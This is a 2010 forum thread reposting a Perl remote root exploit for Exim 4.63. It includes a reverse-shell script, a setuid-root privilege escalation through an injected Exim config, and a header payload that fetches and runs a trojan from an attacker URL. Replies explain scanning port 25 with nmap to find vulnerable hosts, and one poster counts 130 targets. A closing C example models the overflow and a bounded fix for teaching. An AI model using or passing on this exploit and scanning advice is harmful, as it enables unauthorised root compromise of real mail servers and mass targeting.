pyth0n3 Posted December 11, 2010

[code]
#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module

=for comment

use this connect back shell as "trojanurl" and be sure to setup a netcat,

---snip---
$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
    print "Usage: $0 [Host] [Port] \n\n";
    die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");

open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    setuid(0);
    setgid(0);
    setgroups(0, NULL);
    execl("/bin/sh", "sh", NULL);
}
};
close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");

open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");

system("uname -a;");
system("/var/spool/exim4/s");
system($system);
---snip---

=cut

use IO::Socket;

if ($#ARGV ne 3) {
    print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n";
    print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n";
    exit;
}

$|=1;

$trojan = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];

$helohost = "abcde.com";
$max_msg = 52428800;

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "25",
                                 Proto    => 'tcp');

while(<$sock>) {
    print;
    if ($_ =~ /220 /) { last; }
}

print $sock "EHLO $helohost\r\n";

while(<$sock>) {
    print;
    if ($_ =~ /250-SIZE (\d+)/) {
        $max_msg = $1;
        print "Set size to $max_msg !\n";
    }
    if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) {
        $revdns = $1;
        $saddr = $2;
    }
    if ($_ =~ /250 /) { last; }
}

if ($revdns eq $helohost) {
    $vv = "";
}
else {
    $vv = $revdns . " ";
}
$vv .= "(" . $helohost . ")";

$from = "root\@local.com";
$to = "postmaster\@localhost";

$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;

$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";

$filler = "V" x (8 * 16);
$logbuffer_size -= 3;

for ($k=0;$k<60;$k++) {
    if (length($logbuffer) >= $logbuffer_size) { last; }
    $hdr = sprintf("Header%04d: %s\n", $k, $filler);
    $newlen = length($logbuffer) + length($hdr);
    if ($newlen > $logbuffer_size) {
        $newlen -= $logbuffer_size;
        $off = length($hdr) - $newlen - 2 - 1;
        $hdr = substr($hdr, 0, $off);
        $hdr .= "\n";
    }
    $hdrs .= $hdr;
    $logbuffer .= " " . $hdr;
}

$hdrx = "HeaderX: ";
$k2 = 3;
for ($k=1;$k<=200;$k++) {
    if ($k2 > 12) { $k2 = 3; }
#   $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} ";
    $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";
    $k2++;
}

$v = "A" x 255 . "\n";
$body = "";
while (length($body) < $msg_len) {
    $body .= $v;
}
$body = substr($body, 0, $msg_len);

print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
$v = <$sock>;
print $v;
print $sock "DATA\r\n";
$v = <$sock>;
print $v;
print "Sending large buffer, please wait...\n";
print $sock $hdrs;
print $sock $hdrx . "\n";
print $sock $body;
print $sock "\r\n.\r\n";
$v = <$sock>;
print $v;
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
while(1){};
[/code]

Source: Full Disclosure

Note: All Debian distributions run exim4 by default.
Debian: 2131-1: exim4: arbitrary code execution
S1ash Posted December 11, 2010

Just tried on CentOS - it's not working =(

[code]
250-SIZE 52428800
Set size to 52428800 !
250-PIPELINING
250-STARTTLS
250 HELP
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
Sending large buffer, please wait...
552 Message size exceeds maximum permitted
250 OK
[/code]

Maybe because of "552 Message size exceeds maximum permitted"??
The Dev!L Posted December 12, 2010

He played with his code, I mean Kingcope, and this version is old; I think no server has it. Just look at lines 109-110 for the error. With best wishes for all.
PuRiCeL Posted December 15, 2010

A marvel of an exploit, works perfectly! +1
cuteremus Posted December 20, 2010

Can someone help me / tell me how I can make a scanner out of this exploit, and which port do I scan? Please send me an email at cute.remus [at] yahoo.com
pyth0n3 Posted December 20, 2010 (Author) (edited)

[quote]Can someone help me / tell me how I can make a scanner out of this exploit, and which port do I scan? Please send me an email at cute.remus [at] yahoo.com[/quote]

A script can be written in any programming language that runs a scan of the choose-random or range-of-targets type on port 25. Of course it will also have to do service version detection, after which a filter is created so that only the targets whose banner contains (Exim smtpd 4) and whose ports are, of course, in the open state get saved (the filtered or closed options must not be taken into account by the filter you create).

P.S. I assume the company you work for asked you for something like this for pentesting.

Edited December 20, 2010 by pyth0n3
cuteremus Posted December 20, 2010

I need that service version detection; is there a download for it? Or does anyone have it? Thanks in advance.
pyth0n3 Posted December 20, 2010 (Author)

[quote]I need that service version detection; is there a download for it? Or does anyone have it? Thanks in advance.[/quote]

man nmap

-sV: Probe open ports to determine service/version info

P.S. I assume that at the company you work for you use nmap for Network Discovery.
sTrEs Posted December 28, 2010 (edited)

[quote]A script can be written in any programming language that runs a scan of the choose-random or range-of-targets type on port 25. Of course it will also have to do service version detection, after which a filter is created so that only the targets whose banner contains (Exim smtpd 4) and whose ports are, of course, in the open state get saved (the filtered or closed options must not be taken into account by the filter you create).

P.S. I assume the company you work for asked you for something like this for pentesting.[/quote]

Good shit, thanks for all the information.

Edited December 29, 2010 by sTrEs
napoletanii Posted December 29, 2010

Ohh, there are very many vulnerable ones, 130 on a single class A :)
mitzayapa Posted February 2, 2011 (edited)

Can someone get me #shell.txt#? For me it redirects to another page... or what is shell.txt? Does it give you a connect-back session for firewall/router? Thanks, nice one.

Edited February 2, 2011 by mitzayapa
pyth0n3 Posted February 2, 2011 (Author)

[quote]Can someone get me #shell.txt#? For me it redirects to another page... or what is shell.txt? Does it give you a connect-back session for firewall/router? Thanks, nice one.[/quote]

Answering on topic: shell.txt is a text file, since it has the .txt extension; in this case the file is named shell. Anyone can get hold of a file named shell.txt: right-click and create the file. For other details, and for what you want this file to contain, you are free to ask questions, but if possible in another section, for example AJUTOR (Help), because here you are off topic.
Zatarra Posted February 2, 2011

[quote]Just tried on CentOS - it's not working =(

250-SIZE 52428800
Set size to 52428800 !
250-PIPELINING
250-STARTTLS
250 HELP
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
Sending large buffer, please wait...
552 Message size exceeds maximum permitted
250 OK

Maybe because of "552 Message size exceeds maximum permitted"??[/quote]

It does exactly the same for me ;-|
Flubber Posted February 2, 2011

[quote]It does exactly the same for me ;-|[/quote]

Probably because of:

[code]
[B]$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;[/B]

$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
[/code]

It's patched and can't write more than it needs to, something like with a BoF. So...
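The script above builds its headers so that the rejection log line plus the message headers add up to just over an 8192-byte buffer, and the last two posts explain that a patched server simply does not write past that size. The following C program is an added example, not code from the thread, from Kingcope or from Exim; it models that bug class as a reject handler that copies the rejection line and then each header into one fixed-size buffer, with an unbounded strcat() pattern shown beside a bounded append that refuses what does not fit. Every name, the rejection line and the filler are constructed; only the 8192-byte size, the "HeaderNNNN: VVV..." filler shape and the read/max values (the 250-SIZE seen in the thread plus 256 KB) are taken from the posts.

```c
/*
 * Added example, not code from the thread, from Kingcope or from Exim.
 * Models a reject handler that logs the rejection line followed by every
 * message header into one fixed-size buffer.  Names, rejection line and
 * filler are constructed; only the 8192-byte size, the header filler shape
 * and the read/max sizes come from the thread.
 */
#include <stdio.h>
#include <string.h>

#define LOGBUF_SIZE 8192                      /* buffer size the exploit assumes   */
#define MAX_BYTES   52428800                  /* 250-SIZE value seen in the thread */
#define READ_BYTES  (MAX_BYTES + 256 * 1024)  /* msg_len = max_msg + 1024*256      */
#define REJECT_FMT  "rejected from <root@example.invalid>: message too big: read=%d max=%d\n"

/* The unsafe pattern: strcat() does not know how large buf is, so a long
 * run of headers keeps writing past its end.  Shown for contrast only;
 * nothing below calls it. */
void append_unbounded(char *buf, const char *s)
{
    strcat(buf, s);
}

/* The safe pattern: track bytes used, refuse anything that would not fit
 * together with the NUL terminator, and report the refusal to the caller
 * instead of silently overflowing or truncating. */
int append_bounded(char *buf, size_t size, size_t *used, const char *s)
{
    size_t n = strlen(s);
    if (n > size - 1 - *used)
        return 0;                             /* would overflow: rejected */
    memcpy(buf + *used, s, n + 1);
    *used += n;
    return 1;
}

/* Bytes an unbounded writer would emit for nhdr headers of filler_len
 * bytes each (computed with snprintf(NULL, 0, ...), nothing is written).
 * Compare the result against LOGBUF_SIZE. */
size_t unbounded_log_length(int nhdr, size_t filler_len)
{
    size_t total   = (size_t)snprintf(NULL, 0, REJECT_FMT, READ_BYTES, MAX_BYTES);
    size_t per_hdr = (size_t)snprintf(NULL, 0, " Header%04d: ", 0) + filler_len + 1;
    return total + (size_t)nhdr * per_hdr;
}

/* Builds the log entry with bounded appends into a LOGBUF_SIZE buffer.
 * Returns how many of the nhdr headers fit; if out_len is non-NULL it
 * receives the final string length, which is always below LOGBUF_SIZE. */
int bounded_headers_that_fit(int nhdr, size_t filler_len, size_t *out_len)
{
    static char buf[LOGBUF_SIZE];
    char line[600];
    char filler[256];
    size_t used = 0;
    int accepted = 0;

    if (filler_len > sizeof filler - 1)
        filler_len = sizeof filler - 1;
    memset(filler, 'V', filler_len);          /* same "VVV..." filler as the script */
    filler[filler_len] = '\0';

    buf[0] = '\0';
    snprintf(line, sizeof line, REJECT_FMT, READ_BYTES, MAX_BYTES);
    if (!append_bounded(buf, sizeof buf, &used, line))
        return 0;

    for (int k = 0; k < nhdr; k++) {
        snprintf(line, sizeof line, " Header%04d: %s\n", k, filler);
        if (!append_bounded(buf, sizeof buf, &used, line))
            break;                            /* out of room: stop, never overflow */
        accepted++;
    }
    if (out_len)
        *out_len = used;
    return accepted;
}

int main(void)
{
    size_t len;
    int fit = bounded_headers_that_fit(60, 128, &len);
    printf("unbounded writer would emit %zu bytes into a %d-byte buffer\n",
           unbounded_log_length(60, 128), LOGBUF_SIZE);
    printf("bounded writer kept %d of 60 headers, %zu bytes\n", fit, len);
    return 0;
}
```

With the script's own parameters (60 headers of 128 filler bytes) the unbounded writer would need 8602 bytes for an 8192-byte buffer, which is the overrun the exploit depends on; the bounded writer stops after 57 headers and stays within the buffer, which is the behaviour behind the "can't write more than it needs to" remark above.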